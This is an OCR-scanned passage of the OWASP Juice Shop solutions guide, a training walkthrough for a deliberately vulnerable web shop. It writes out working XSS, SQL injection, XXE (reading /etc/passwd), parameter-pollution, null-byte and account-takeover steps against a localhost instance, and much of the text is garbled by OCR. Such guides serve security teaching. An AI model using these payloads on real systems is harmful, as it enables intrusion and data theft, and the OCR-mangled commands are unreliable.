Behave like any "white hat" should before getting 
into the action 


1. Visit https://securitytxt.org/ to learn about a proposed standard which allows 
websites to define security policies. 

2. Request the security policy file from the server at http://localhost:3000/.well- 
known/security.txt to solve the challenge. 

3. Optionally, write an email to the mentioned contact address 
donotreply@owasp-juice.shop and see what happens... :e-mail: 


Inform the shop about an algorithm or library it 
should definitely not use the way it does 


Juice Shop uses some inappropriate crypto algorithms and libraries in different 
places. While working on the following topics (and having the package.json.bak at 
hand) you will learn those inappropriate choices in order to exploit and solve 
them: 


e Forge a coupon code that gives you a discount of at least 80% exploits z85 
(Zero-MQ Base85 implementation) as the library for coupon codes. 

e Solve challenge #999 requires you to create a valid hash with the hashid 
library. 

e Passwords in the users table are hashed with unsalted MD5 

e Users registering via Google account will receive a very silly default 
password that involves Base64 encoding. 


1. Visit http://localhost:3000/#/contact. 
2. Submit your feedback with one of the following words in the comment: zss , 


base85 , base64 , md5 OF hashid . 


Perform an XSS attack on a legacy page within the 
application 


1. Log in as any user. 
2. Visit our user profile page at http://localhost:3000/profile. 
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3. Type in any Username and click the Set Username button. 

4. Notice that the username is displayed beneath the profile image. 

5. Change the username into <script>alert(*xss*)</script> and click Set 
Username. 

6. Notice the displayed username under the profile picture now iS lert(>xss*) 
while in the Username field it shows lert(>xss*)</script> - both a clear 
indication that the malicious input was sanitized. Obviously the sanitization 
was not very sophisticated, as the input was quite mangled and even the 
closing <script> tag survived the procedure. 

7. Change the username into <<alascript>alert(*xss*)</script> and click Set 
Username. 

8. The naive sanitizer only removes <ala effectively changing the username 
into <script>alert(*xss*)</script> thus resulting in the expected alert box 
popping up. 


xxx Challenges 


Register as a user with administrator privileges 
1. Submit a post request to http://localhost:3000/api/Users with: 


o {"email":"admin","password":"admin","isAdmin":true} aS body 
o and application/json AS Content-Type 


hup:/flocalhost-3000/apyusers 


http://ocalhost:300 


POST ~ http:/localhost:3 





2. Upon your next visit to the application's web UI the challenge will be marked 
as solved. 


Put an additional product into another user's 
shopping basket 


1. Log in as any user. 

2. Inspect HTTP traffic while putting items into your own shopping basket to 
learn your own Basketid . For this solution we assume yours is 1 and 
another user's basket with a BasketId of 2 exists. 

3. Submit a post request to http://localhost:3000/api/Basketltems with payload 
aS {"ProductId": 14,"BasketId": "2","quantity": 1} making sure no product of 
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that with Producttd of 14 is already in the target basket. Make sure to 
supply your authorization Bearer token in the request header. 

4. You will receive a (probably unexpected) response of {'error' : ‘Invalid 
BasketId'} - after all, it is not your basket! 

5. Change your post request into utilizing HTTP Parameter Pollution (HPP) by 
supplying your own BasketId and that of someone else in the same payload, 
i.€. {"ProductId": 14,"BasketId": "1","quantity": 1,"BasketId": "2"} . 

6. Submitting this request will satisfy the validation based on your own BasketId 
but put the product into the other basket! 


@ With other Baskettd s you might need to play with the order of the duplicate 
property a bit and/or make sure your own BasketId is lower than the one of the 
target basket to make this HPP vulnerability work in your favor. 


Supplying multiple HTTP parameters with the same name may cause an 
application to interpret values in unanticipated ways. By exploiting these 
effects, an attacker may be able to bypass input validation, trigger 
application errors or modify internal variables values. As HTTP Parameter 
Pollution (in short HPP) affects a building block of all web technologies, 
server and client side attacks exist. 


Current HTTP standards do not include guidance on how to interpret 
multiple input parameters with the same name. For instance, RFC 3986 
simply defines the term Query String as a series of field-value pairs and 
RFC 2396 defines classes of reserved and unreserved query string 
characters. Without a standard in place, web application components 
handle this edge case in a variety of ways (see the table below for details). 


By itself, this is not necessarily an indication of vulnerability. However, if the 
developer is not aware of the problem, the presence of duplicated 
parameters may produce an anomalous behavior in the application that can 
be potentially exploited by an attacker. As often in security, unexpected 
behaviors are a usual source of weaknesses that could lead to HTTP 
Parameter Pollution attacks in this case. To better introduce this class of 
vulnerabilities and the outcome of HPP attacks, it is interesting to analyze 
some real-life examples that have been discovered in the past. 


Submit 10 or more customer feedbacks within 10 
seconds 


1. Open the Network tab of your browser DevTools and visit 
http://localhost:3000/#/contact 

2. You should notice a cet request to http://localhost:3000/rest/captcha/ which 
retrieves the CAPTCHA for the feedback form. The HTTP response body will 
look similar to {"captchaId":18, "captcha":"5*8*8","answer":"320"} . 

3. Fill out the form normally and submit it while checking the backend interaction 
in your Developer Tools. The CAPTCHA identifier and solution are 
transmitted along with the feedback in the request body: {comment: "Hello", 
rating: 1, captcha: "320", captchaId: 18} 

4. You will notice that a new CAPTCHA is retrieved from the REST endpoint. It 
will present a different math challenge, e.g. {"captchaId":19, "captcha": "1*1- 
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1", "answer": "@"} 

5. Write another feedback but before sending it, change the captchald and 
captcha parameters to the previous values of captchaId and answer . In this 
example you would submit captcha: "320", captchaId: 18 instead of captcha: 
"o", captchaId: 19. 

6. The server will accept your feedback, telling your that the CAPTCHA can be 
pinned to any previous one you like. 

7. Write a script with a 10-iteration loop that submits feedback using your 
pinned captchalId and captcha parameters. Running this script will solve the 
challenge. 


Two alternate (but more complex) solutions: 


e Rewrite your script so that it parses the response from each CAPTCHA 
retrieval call to http://localhost:3000/rest/captcha/ and sets the extracted 
captchalId and answer parameters in each subsequent form submission as 
captchald and captcha . 
e Using an automated browser test tool like Selenium WebDriver you could do 
the following: 
1. Read the CAPTCHA question from the HTML element <code id="captcha" 
Pies 
2. Calculate the result on the fly using JavaScript 
3. Let WebDriver write the answer into the <input name="feedbackCaptcha" 
...> field. 


The latter is actually the way it is implemented in the end-to-end test for this 
challenge: 
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let comment, rating, submitButton, captcha 


beforeEach(() => { 
browser. get('/#/contact') 
comment = element(by.id(' comment‘ )) 
rating = $$('.br-unit').last() 
captcha = element(by.id('captchaControl')) 
submitButton = element(by.id('submitButton')) 
solveNextCaptcha() 

H» 


describe('challenge "captchaBypass"', () => { 
it('should be possible to post 10 or more customer feedbacks in less than 10 secor 
for (var i = 0; i < 11; i++) { 
comment .sendKeys('Spam #' + i) 
rating.click() 
submitButton.click() 
browser. sleep(200) 
solveNextCaptcha() // first CAPTCHA was already solved in beforeEach 
} 
H) 


protractor.expect.challengeSolved({ challenge: ‘CAPTCHA Bypass Tier 1' }) 
}) 


function solveNextCaptcha () { 
element (by.id(‘captcha')).getText().then((text) => { 
const answer = eval(text).toString() // eslint-disable-line no-eval 
captcha. sendKeys (answer) 


H 


It is worth noting that both alternate solutions would still work even if the 
CAPTCHA-pinning problem would be fixed in the application! 


Post some feedback in another users name 


1. Go to the Contact Us form on http://localhost:3000/#/contact. 
2. Inspect the DOM of the form in your browser to spot this suspicious text field 
right at the top: <input _ngcontent-c23 hidden id="userId" type="text" class="ng- 


untouched ng-pristine ng-valid"> 


¥<app-contact _nghost-c23 class="ng-star-inserted"> 
yv<div _ngcontent-c23 fxlayoutalign="center" style="place-content: stretch center; 
align-items: stretch; flex-direction: row; box-sizing: border-box; display: flex;"> 
v<mat-card _ngcontent-c23 class="mat-card”> 
<h3 _ngcontent-c23 translate>Contact Us</h3> 
<!----> 
<!----> 


yv<div _ngcontent-c23 class="form-container” > 
<input _ngcontent-c23 hidden id="userId" type="text" class="ng-untouched ng- 





pristine ng-valid"> — $ 
> <mat-form-field _ngcontent-c23 appearance="outline” class="mat-form-field ng- 
tns-c8-15 mat-primary mat-form-field-type-mat-input mat-form-field-appearance- 
outline mat-form-field-can-float mat-form-field-disabled ng-untouched ng- 
pristine mat-form-field-should-float” >..</mat-form-field> 
»<mat-form-field _ngcontent-c23 appearance="outline” class="mat-form-field ng- 
z ms To ers 


Sites, Se ee eae ees eae ae: i SESS Soc ee, eau Chee sane aa 


3. In your browser's developer tools remove the hidden attribute from above 
<input> tag. 
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Contact Us 


Comment 


This will make the admin look real bad! 





4. The field should now be visible in your browser. Type any user's database 
identifier in there (other than your own if you are currently logged in) and 
submit the feedback. 


You can also solve this challenge by directly sending a post to 
http://localhost:3000/api/Feedbacks endpoint. You could for example be logged 
out but provide any userid in the JSON payload. 


Post a product review as another user or edit any 
user's existing review 
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1. Select any product and write a review for it 


Apple Juice @ 01010) 001) 


Image Price Description 


R 1.99 Theall-time classic. 
Apple Juice (1000r 


Apple Pomace 


Banana Juice (1000 Reviews 
ladmin@juice-sh.op 
One of my favorites! 
Carrot Juice (1000 
This is a very bad product 
Eggfruit Juice (501 


A Submit 





G 


2. Submit the review while observing the networks tab of your browser. 


§ CR O mspector © Console O Debugger {} StyleEditor P} Network > B fi X 
Ü | F Fiterurt 1] C Persist Logs C Disable cache No throttling HAR $ 
E HTM css js XHR Fonts Images Meda WS Other 


3. Analyze the put request. 


Apple Juice (1000m!) 
Image Price Description 
A 1.99 The all-time classic. 











Status Met.. Domain File Cause Type Transferred Size 
«he json 3538 198 


s 453.8/1,09 KB transferred — Finish: 61 ms 


Method URL 
PUT http://localhost:3000/rest/product/T/reviews 


aders 





Reviews en 


User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/67.0 
‘Accept: application/json, text/plain, */* 

Accept-Language: en-US.en:q=0.5, 

Accept-Encoding: gzip. deflate 

Referer: http://localhost:3000/ 

X-User-Email: admin@juice-sh.op 

Content-Type: application/json 


Request Body 


‘{'message™"This is very bad product',"author":"Anonymous"} 


4. Change the author name to admin@juice-sh.op iN Request Body and re-send 
the request. 


Log in with Chris’ erased user account 


e Login with Email chris.pike@juice-sh.op'-- and any Password if you already 
know the email address of Chris. 

e orlog in with Email as \' or deletedAt Is NOT NULL-- and any Password you 
like for a "lucky hit" as Chris seems to be the only or at least first ever deleted 
user. The presence of deletedat you might have derived from Retrieve a list 
of all user credentials via SQL Injection and enforcing it to be not nutt will 
give you back only users who were soft-deleted at some point of time. 


Log in with Amy's original user credentials 


1. Google for either 93.83 billion trillion trillion centuries OF One Important 
Final Note. 

2. Both searches should show https://www.grc.com/haystack.htm as one of the 
top hits. 

3. After reading up on Password Padding try the example password 
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4. She actually did a very similar padding trick, just with the name of her 
husband Kif written as K1f instead of DOg from the example! She did not 
even bother changing the padding length! 

5. Visit http://localhost:3000/#/login and log in with credentials amy@juice-sh.op 
and password k1f.............ee eee e ee to solve the challenge 


Log in with Bender's user account 


e Login with Email bender@juice-sh.op'-- and any Password if you already 
know the email address of Bender. 

e Arainbow table attack on Bender's password will probably fail as it is rather 
strong. You can alternatively solve Change Bender's password into 
slurmCl4ssic without using SQL Injection or Forgot Password first and then 
simply log in with the new password. 


Log in with Jim's user account 


e Login with Email jim@juice-sh.op'-- and any Password if you already know 
the email address of Jim. 

e orlogin with Email jim@juice-sh.op and Password ncc-17e1 if you looked up 
Jim's password hash in a rainbow table after harvesting the user data as 
described in Retrieve a list of all user credentials via SQL Injection. 


Place an order that makes you rich 


1. Log in as any user. 

2. Put at least one item into your shopping basket. 

3. Note that reducing the quantity of a basket item below 1 is not possible via 
the UI 

4. When changing the quantity via the UI, you will notice put requests to 
http://localhost:3000/api/Basketltems/{id} in the Network tab of your DevTools 

5. Memorize the {ia} of any item in your basket 

6. Copy your authorization header from any HTTP request submitted via 
browser. 

7. Submit a put request to http://localhost:3000/api/Basketltems/{id} replacing 
{id} with the memorized number from 5. and with: 


o {"quantity": -100} aS body, 

© application/json AS Content-Type 

o and Bearer ? AS Authorization header, replacing the > with the token 
you copied from the browser. 
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http://localhost 3000/api/Basket 


hetp://localhost:3000/api/Basketitems/1 


PUT = httpy/localhost:3000/api/Basketitems/1 





8. Visit http://localhost:3000/#/basket to view Your Basket with the negative 
quantity on the first item 


Your Basket (bjoern.kimminich@owasp.org) 


Product Quantity Total Price 


Apple Juice 


-100 -199.00 
(1000ml) 5 





9. Click Checkout to issue the negative order and solve this challenge. 


order_8194-Ocb7c2a6e1 1ef26f.pdf 1/1 È: x = 





OWASP Juice Shop - Order Confirmation 


Customer: bjoern.kimminich@owasp.org 


Order #: 8194-Ocb7c2a6e1 1ef26f 
-100x Apple Juice (1000ml) ea. 1.99 = -199 
Total Price: -199 


Thank you for your order! 


Prove that you actually read our privacy policy 


1. Open http://localhost:3000/#/privacy-security/privacy-policy. 
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2. Moving your mouse cursor over each paragraph will make a fire-effect 
appear on certain words or partial sentences. 


JE OWASP Juice Shop s) Login Search... Q WPscoreBoard AboutUs 


Qy Contact Us z 


We use cookies and similar tracking technologies to track the activity on our Service and hold 
Menu certain information. 


Cookies are files with small amount of data which may include an anonymous unique 
identifier. Cookies are sent to your browser from a website and stored on your device. Tracking 
technologies also used are beacons, tags, and scripts to collect and track information and to 
improve and analyze our Service. 


Privacy Policy 


Two Factor Authentication 
You can instruct your browser to refuse all cookies or to indicate when a cookie is being sent. 


However, if you do not accept cookies, you may not be able to use some portions of our 
Change Password Sevice. 


Last Login IP Examples of Cookies we use: 


* Session Cookies. We use Session Cookies to operate our Service. 
Request Data Export + Preference Cookies. We use Preference Cookies to remember your preferences and 
various settings. 
* Security Cookies. We use Security Cookies for security purposes. 





3. Inspect the HTML in your browser and note down all text inside <span 
class="hot"> tags, which are http://localhost , We may also , instruct you, to 
refuse all , reasonably necessary and responsibility . 

4. Combine those into the URL 
http://localhost:3000/we/may/also/instruct/you/to/refuse/all/reasonably/necess 
ary/responsibility (adding the server port if needed) and solve the challenge 
by visiting it. 


It seems the Juice Shop team did not appreciate your extensive reading effort 


enough to provide even a tiny gratification, as you will receive only a 404 Error: 
ENOENT: no such file or directory, stat 


"/app/frontend/dist/frontend/assets/private/thank-you.jpg' . 


Change the href of the link within the O-Saft product 
description 


1. By searching for O-Saft directly via the REST API with 
http://localhost:3000/rest/products/search?q=o-saft you will learn that it's 
database ID is 9. 

2. Submit a put request to http://localhost:3000/api/Products/9 with: 


o {"description": "<a href=\"http://kimminich.de\" target=\"_blank\">More... 
</a>"} aS body 
o and application/json AS Content-Type 


No Environment 
http:/localhost:3000/api/Produc 


http://localhost:3000/api/Products/9 


PUT http://localhost:3000/api/Products/9 


Body 


form-data x-www-form-urlencoded 





Reset the password of Bjoern's OWASP account via 
the Forgot Password mechanism 
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1. Find Bjoern's OWASP Juice Shop playlist on Youtube 

2. Watch BeNeLux Day 2018: Juice Shop: OWASP's Most Broken Flagship - 
Bjorn Kimminich 

3. This conference talk recording immediately dives into a demo of the Juice 
Shop application in which Bjoern starts registering a new account 3:59 into 
the video (https://youtu.be/Lu0-kDdtVf4?t=239) 

4. Bjoern picks Name of your favorite pet? as his security question and - live on 
camera - answers it truthfully with "Zaya", the name of his family's adorable 
three-legged cat. 

5. Visit http://localhost:3000/#/forgot-password and provide bjoern@owasp.org aS 
your Email. 

6. In the subsequently appearing form, provide zaya as Name of your favorite 
pet? 

7. Then type any New Password and matching Repeat New Password 

8. Click Change to solve this challenge 


Other hints about Bjoern's choice of security answer 


The user profile picture of his account at 


http://localhost:3000/assets/public/images/uploads/13.jpg shows his pet cat 
playing. 





Reset Jim's password via the Forgot Password 
mechanism 


1. Visit http://localhost:3000/#/forgot-password and provide jim@juice-sh.op aS 
your Email to learn that Your eldest siblings middle name? is Jim's chosen 
security question 

2. Jim (whose userid happens to be 2 ) left some breadcrumbs in the 
application which reveal his identity 
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o A product review for the OWASP Juice Shop-CTF Velcro Patch stating 
"Looks so much better on my uniform than the boring Starfleet symbol." 

o Another product review "Fresh out of a replicator." on the Green 
Smoothie product 

o A Recycling Request with the address "Starfleet HQ, 24-593 Federation 
Drive, San Francisco, CA" ( TODO) 

3. It should eventually become obvious that James T. Kirk is the only viable 
solution to the question of Jim's identity 





4. Visit https://en.wikipedia.org/wiki/James_T._Kirk and read the Depiction 
section 

5. It tells you that Jim has a brother named George Samuel Kirk 

6. Visit http://localhost:3000/#/forgot-password and provide jim@juice-sh.op as 
your Email 

7. In the subsequently appearing form, provide samuel as Your eldest siblings 
middle name? 

8. Then type any New Password and matching Repeat New Password 

9. Click Change to solve this challenge 
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Forgot Password 


jim@juice-sh.op 


New Password 





Upload a file larger than 100 kB 


1. The client-side validation prevents uploads larger than 100 kB. 

2. Craft a post request to with a form 
parameter file that contains a PDF file of more than 100 kB but less than 
200 kB. 


VALUE 


Dateien auswahlen PAYET 





3. The response from the server will be a 2ə4 with no content, but the 
challenge will be successfully solved. 


Files larger than 200 kB are rejected by an upload size check on server side with 
a 5ee error stating Error: File too large . 


Upload a file that has no .pdf or .zip extension 


1. Craft a post request to with a form 
parameter file that contains a non-PDF file with a size of less than 200 kB. 


hitp://demo. 


http:/Mlocalhost:3000/file-upload 


Post hutp/ocalhost:3000/fle-upload 


vi 
Date ählen eaa ae 
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2. The response from the server will be a 2e4 with no content, but the 
challenge will be successfully solved. 


Uploading a non-PDF file larger than 100 kB will solve Upload a file larger than 
100 kB simultaneously. 


Perform a persisted XSS attack bypassing a client- 
side security mechanism 


1. Submit a POST request to http://localhost:3000/api/Users with 


o {"email": "<iframe src=\"javascript:alert( XSS )\">", "password": "xss"} aS 
body 
o and application/json aS Content-Type header. 


localhost-3000/api/Users 





2. Log in to the application with an admin. 
3. Visit http://localhost:3000/#/administration. 
4. An alert box with the text "xss" should appear. 


OWASP Juice Sho) fre Benen] Aut einer in dieser Seite eingebetteten Seite wird Folgendes 
4 pO logo Q angezeigt 


Recycling Requests 


User Quantity Address 





5. Close this box. Notice the somewhat broken looking row in the Registered 
Users table? 

6. Click the "eye"-button in that row. 

7. A modal overlay dialog with the user details opens where the attack string is 
rendered as harmless text. 
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@ 


o 


o 


e 


User #14 


Email 
<iframe sro='javasoript:aleri(xss')"> 


Created at 
2019-01-04713:10:13.5522, 2019-01-04713:10:13.5522 


Q Close 





Perform a persisted XSS attack without using the 
frontend application at all 


1. Log in to the application with any user. 
2. Copy your authorization header from any HTTP request submitted via 


browser. 
3. Submit a POST request to with 
oO {"name": "XSS", "description": "<iframe src=\"javascript:alert( XSS )\">", 


"price": 47.11} as body, 

© application/json AS Content-Type 

o and Bearer ? AS Authorization header, replacing the > with the token 
you copied from the browser. 





4. Visit 
5. An alert box with the text "xss" should appear. 


JË OWASP Juice Shop @ GhAbmeiden Qy Kontaktiere uns 


‘Alle Produkte 


Raspberry Juice (1000mi) Made from blended Raspberry Pi, water and suger. 


‘Strawberry Juice (500m)) 


Woodruff Syrup "Forest Master X- Harvested and manufactured in the Black Forest, Germany. Gan cause hyperactive behavior 
Treme" in children. Gan cause permanent green tongue when consumed undiluted. 


639 
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6. Close this box. Notice the product row which has a frame border in the 
description in the All Products table 

7. Click the "eye"-button next to that row. 

8. Another alert box with the text "xss" should appear. After closing it the actual 
details dialog pops up showing the same frame border. 


Preis Beschreibung 


47.11 


Rezensionen 


@ Schließen 





Retrieve the content of C:\Windows\system.ini or 
/etc/passwd from the server 


1. Solve the Use a deprecated B2B interface that was not properly shut down 
challenge. 

2. Prepare an XML file which defines and uses an external entity <!ENTITY xxe 
SYSTEM "file:///etc/passwd" >]> (or <!ENTITY xxe SYSTEM 
"file: ///C:/Windows/system.ini" >]> On Windows). 

3. Upload this file through the File Complaint dialog and observe the Javascript 
console while doing so. It should give you an error message containing the 
parsed XML, including the contents of the local system file! 
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<?xml version="1.0" encoding="UTF-8"?> 


<!DOCTYPE foo [<!ELEMENT foo ANY > 
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 


<trades> 
<metadata> 
<name>Apple Juice</name> 
<trader> 
<foo>&xxe;</foo> 
<name>B. Kimminich</name> 
</trader> 
<units>150@</units> 
<price>106</price> 
<name>Lemon Juice</name> 
<trader> 
<name>B. Kimminich</name> 
</trader> 
<units>4500</units> 
<price>195</price> 
</metadata> 
</trades> 


*K*%* % Challenges 


Gain access to any access log file of the server 


1. Solve the Access a confidential document or any related challenges which 
will bring the exposed /ftp folder to your attention. 

2. Visit http://localhost:3000/ftp and notice the file incident-support.kdbx which is 
needed for Log in with the support team's original user credentials and 
indicates that some support team is performing its duties from the public 
Internet and possibly with VPN access. 

3. Guess luckily or run a brute force attack with e.g. OWASP ZAPs DirBuster 
plugin for a possibly exposed directory containing the log files. 

4. Following the hint to drill down deeper than one level, you will at some point 
end up with http://localhost:3000/support/logs. 

5. Inside you will find at least one access.log of the current day. Open or 
download it to solve this challenge. 


~ | support / logs / 


Name Size Modified 


access.log.2019-01-25 5843 18:52:57 2019-1-25 


Order the Christmas special offer of 2014 


1. Open http://localhost:3000/#/search and reload the page with F5 while 
observing the Network tab in your browser's DevTools 

2. Recognize the cet request http://localhost:3000/rest/products/search?q= 
which returns the product data. 
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3. Submitting any SQL payloads via the Search field in the navigation bar will do 


10. 
11. 


12. 


13. 


you no good, as it is only applying filters onto the entire data set what was 
retrieved with a singular call upon loading the page. 


. In that light, the q= parameter on the 


http://localhost:3000/rest/products/search endpoint would not even be 
needed, but might be a relic from a different implementation of the search 
functionality. Test this theory by submitting 
http://localhost:3000/rest/products/searchq=orange which should give you a 
result such as 


{"status":"success","data":[{"id":2,"name":"Orange Juice (1000ml)","description":"Made from 
oranges hand-picked by Uncle 

Dittmeyer.","“price":2.99,"image": "orange juice. jpg", "createdAt": "2018-12-20 07:18:31.358 
+00:00", "updatedAt": "2018-12-20 07:18:31.358 +00:00", "deletedAt":null}]} 


. Submit '; as q via http://localhost:3000/rest/products/search?q='; 
. You will receive an error page with a sQLITE_ERROR: syntax error mentioned, 


indicating that SQL Injection is indeed possible. 


OWASP Juice Shop 
(Express ~4.16.4) 


500 SequelizeDatabaseError: SQLITE_ERROR: near ";": syntax error 


at Query formatError (/app/node_modules/sequelize/lib/dialects/sqlite/query js:423:16) 
at afterExecute (/app/node_modules/sequelize/lib/dialects/sqlite/query.js:119:32) 

at replacement (/app/node_modules/sqlite3/lib/trace js: 19:31) 

at Statement.errBack (/app/node_modules/sqlite3/lib/sqlite3 js:16:21) 


. You are now in the area of Blind SQL Injection, where trying create valid 


queries is a matter of patience, observance and a bit of luck. 


. Varying the payload into '-- for q results in a sQLITE_ERROR: incomplete 


input . This error happens due to two (now unbalanced) parenthesis in the 
query. 


. Using '))-- for q fixes the syntax and successfully retrieves all products, 


including the (logically deleted) Christmas offer. Take note of its id (which 
should be 1e ) 


</a>", "“price":0.01,"image": "orange juice. jpg", "createdAt":"2018-12-20 07:18:31.404 
+00:00", "updatedAt": "2018-12-20 07:18:31.404 +00:00","deletedAt":null}, 
{"id":10,"name":"Christmas Super-Surprise-Box (2014 Edition)","description":"Contains a 
random selection of 10 bottles (each 500ml) of our tastiest juices and an extra fan shirt 
for an unbeatable price! (Seasonal special offer! Limited 
availability! )","price":29.99, "image": "undefined. jpg", "createdAt": "2018-12-20 07:18:31.405 
+80 :80", “updatedAt": "2018-12-20 07:18:31.405 +00:00","“deletedAt":"2014-12-27 00:00:00.000 
eee, {"id":11,"name":"OWASP Juice Shop Sticker (2015/2016 design)","description": "Die- 
cut sticker with the official 2015/2016 logo. By now this is a rare collectors item. 
<em>Out of stock!</em>","price":999.99,"image":"sticker.png", "createdAt": "2018-12-20 
07:18:31.405 +00:00"."“undatedAt":"2018-12-20 07:18:31.405 +00:00"."deletedAt": "2017-04-28 

























Go to http://localhost:3000/#/login and log in as any user. 

Add any regularly available product into you shopping basket to prevent 

problems at checkout later. Memorize your BasketId value in the request 

payload (when viewing the Network tab) or find the same information in the 
bid variable in your browser's Session Storage (in the Application tab). 

Craft and senda post request to htip://localhost:3000/api/Basketltems with 
o {"BasketId": "<Your Basket ID>", "ProductId": 10, "quantity": 1} as body 
o and application/json aS Content-Type 

Go to http://localhost:3000/#/basket to verify that the "Christmas Super- 

Surprise-Box (2014 Edition)" is in the basket 
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14. 


Click Checkout on the Your Basket page to solve the challenge. 


Alternative path without any SQL Injection 


This solution involves a lot less hacking & sophistication but requires more 


attention & a good portion of shrewdness. 


1. 


Retrieve all products as JSON by calling 
http://localhost:3000/rest/products/search?q= 


. Write down all id s that are missing in the otherwise sequential numeric 


range 


. Perform step 12. and 13. from above solution for all those missing id s 
. Once you hit the "Christmas Super-Surprise-Box (2014 Edition)" click 


Checkout for instant success! 


Identify an unsafe product that was removed from the 
shop and inform the shop which ingredients are 
dangerous 


1. 


Solve Order the Christmas special offer of 2014 but enumerate all deleted 
products until you come across "Rippertuer Special Juice" 


. Notice the warning "This item has been made unavailable because of lack of 


safety standards." in its description, indicating that this is the product you 
need to investigate for this challenge 


. Further notice the partial list of ingredients in the description namely 


"Cherymoya Annona cherimola, Jabuticaba Myrciaria cauliflora, Bael Aegle 
marmelos... and others" 


. Submitting either or all of the above ingredients at 


http://localhost:3000/#/contact will not solve this challenge - it must be some 
unlisted ingredients that create a dangerous combination. 


; A simple Google search for Cherymoya Annona cherimola Jabuticaba Myrciaria 


cauliflora Bael Aegle marmelos Should bring up several results, one of them 
being a blog post "Top 20 Fruits You Probably Don’t Know" from 2011. Visit 
this post at https://listverse.com/2011/07/08/top-20-fruits-you-probably-dont- 
know 


. Scrolling through the list of replies you will notice a particular comment from 


user Localhorst saying "Awesome, some of these fruits also made it into our 
"Rippertuer Special Juice"! hitps://pastebin.com/90dUgd7s" 


. Visit https://pastebin.com/90dUgd/s to find a PasteBin paste titled 


"Rippertuer Special Juice Ingredients" containing a JSON document with 
many exotic fruits in it, each with its name as type and a detailed 


description 


. When carefully reading all fruit descriptions you will notice a warning on the 


Hueteroneel fruit that "this coupled with Eurogium Edule was sometimes 
found fatal" 
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GP PASTEBIN [BREE] o tok 





9. AS Eurogium Edule is also on the very same list of ingredients, these two must 
be the ones you are looking for 
10. Submit a comment containing both Eurogium Edule and Hueteroneel via 
http://localhost:3000/#/contact to solve this challenge 


Find the hidden easter egg 


1. Use the Poison Null Byte attack described in Access a developer's forgotten 
backup file... 
2. ...to download http://localhost:3000/ftp/eastere.gg%2500.md 


Apply some advanced cryptanalysis to find the real 
easter egg 


1. Get the encrypted string from the eastere.gg from the Find the hidden easter 
egg challenge: 
L2d1ci9xcmlmL251ci9mYi9zaGFhbC9ndXIsL3V2cS9uYS9ybmZncmUvcnROL 2p2Z3V2YS9ndXIvcm5mZ3 
J1L3J@dA== 

2. Base64-decode this into 
/gur/qrif/ner/fb/shaal/gurl/uvq/na/rnfgre/rtt/jvguva/gur/rnfgre/rtt 

3. Trying this as a URL will not work. Notice the recurring patterns ( rtt , gur 
etc.) in the above string 

4. ROT13-decode this into 
/the/devs/are/so/funny/they/hid/an/easter/egg/within/the/easter/egg 

5. Visit 
http://localhost:3000/the/devs/are/so/funny/they/hid/an/easter/egg/within/the/e 
aster/egg 


201 


rotationSpeed 


ambientLightColo #111111 


Close Controls 





6. Marvel at the real easter egg: An interactive 3D scene of Planet Orangeuze! 


ROT13 ("rotate by 13 places", sometimes hyphenated ROT-13) is a simple 
letter substitution cipher that replaces a letter with the letter 13 letters after 
it in the alphabet. ROT13 is a special case of the Caesar cipher, developed 
in ancient Rome. 


Because there are 26 letters (2x13) in the basic Latin alphabet, ROT13 is 
its own inverse; that is, to undo ROT13, the same algorithm is applied, so 
the same action can be used for encoding and decoding. The algorithm 
provides virtually no cryptographic security, and is often cited as a 
canonical example of weak encryption. | 


Successfully redeem an expired campaign coupon 
code 


1. Open main.js in your Browser's dev tools and search for campaign . 






















[E main-es2015js main-2s2015 js:formatted pl 
© Pretty-print this minifies more never show X 
6 » 1=>console.log(1)) gi 
> 1=>console.1og(1)) 
Coupon() { 
is.couponPanelExpanded = !ti uponPanelExpanded, 
calStorage.setItem("couponPanelExpanded", JSON.stringify(this.couponPanelExpanded)) 
ment() { 
paymentPanelExpanded = !this.paymentPanelExpanded, 
calStorage.setItem("paymentPanelExpa ISON. striny -paymentPanelExpanded) ) 
checkout() { 
9 Service. checkout (Number (sessionStorage. d")), btoa(this.fampaagncoupon + "-" + this.clientDate)).subscribe(1=>{ 
directUrl = this.basketService.hostServer 





ce .nativeblindow. location.repli redirectUrl) 
> 1=>console.1og(1)) 

15 applyCoupon() { 
th paignCoupon = this.couponControl.value, 

entDate = new D 













clientDate.getT: 
this. couponControl 





? 15519996e5 === this.clientDate ? this.showConfirmation(75) : (this.confirmation = void @, 





valid Coupon." 





‘orm()) : 
owConfirmatii 


asketService.applyCoupon(Number(sessionStorage.getItem("bic")), encodeURIComponent(this.couponControl.value)).st 









rmation(1) { 
resetForm(), 





7\ 4 > 
campaign avi Aa > Cancel 


Line 2109, Column 94 


2. You will find a function applycoupon() that contains a static comparison 
"WMNSDY2@19" === this.couponControl.value pointing to wmnspy2e19 as the 
solution. 
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3. Submitting wmnspy2e19 will yield an Invalid coupon. error, though. This is 
because of the second part of the validity check 15519996e5 === 
this.clientDate 

4. Converting this number into a JavaScript date will tell you that this campaign 
was active on March 8th 2019 only: Women's Day! 

5. Set the time of your computer to March 8th 2019 and try to submit the code 
again. 

6. This time it will be accepted! Proceed to Checkout to get the challenge 
solved. 


Access a developer's forgotten backup file 


1. Browse to http://localhost:3000/ftp (like in Access a confidential document. 
2. Opening http://localhost:3000/ftp/package.json.bak directly will fail 
complaining about an illegal file type. 
3. Using a Poison Null Byte ( xee ) the filter can be tricked, but only with a twist: 
o Accessing http://localhost:3000/ftp/package.json.bak%00.md will 
surprisingly not succeed... 
o ...because the % character needs to be URL-encoded (into %25 ) as 
well in order to work its magic later during the file system access. 
4. http://localhost:3000/ftp/package.json.bak%2500.md will ultimately solve the 
challenge. 


By embedding NULL Bytes/characters into applications that do not handle 
postfix NULL terminators properly, an attacker can exploit a system using 
techniques such as Local File Inclusion. The Poison Null Byte exploit takes 
advantage strings with a known length that can contain null bytes, and 
whether or not the API being attacked uses null terminated strings. By 
placing a NULL byte in the string at a certain byte, the string will terminate 


at that point, nulling the rest of the string, such as a file extension.2 


Access a salesman's forgotten backup file 


1. Use the Poison Null Byte attack described in Access a developer's forgotten 
backup file... 
2. ...to download http://localhost:3000/ftp/coupons_2013.md.bak%2500.md 


Log in with Bjoern's Gmail account 


1. Bjoern has registered via Google OAuth with his (real) account 
bjoern.kimminich@googlemail.com. 

2. Cracking his password hash will probably not work. 

3. To find out how the OAuth registration and login work, inspect the main. js 
and search for oauth , which will eventually reveal a function 


userService.oauthLogin() . 
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[4 mainis main,js:formatted X 


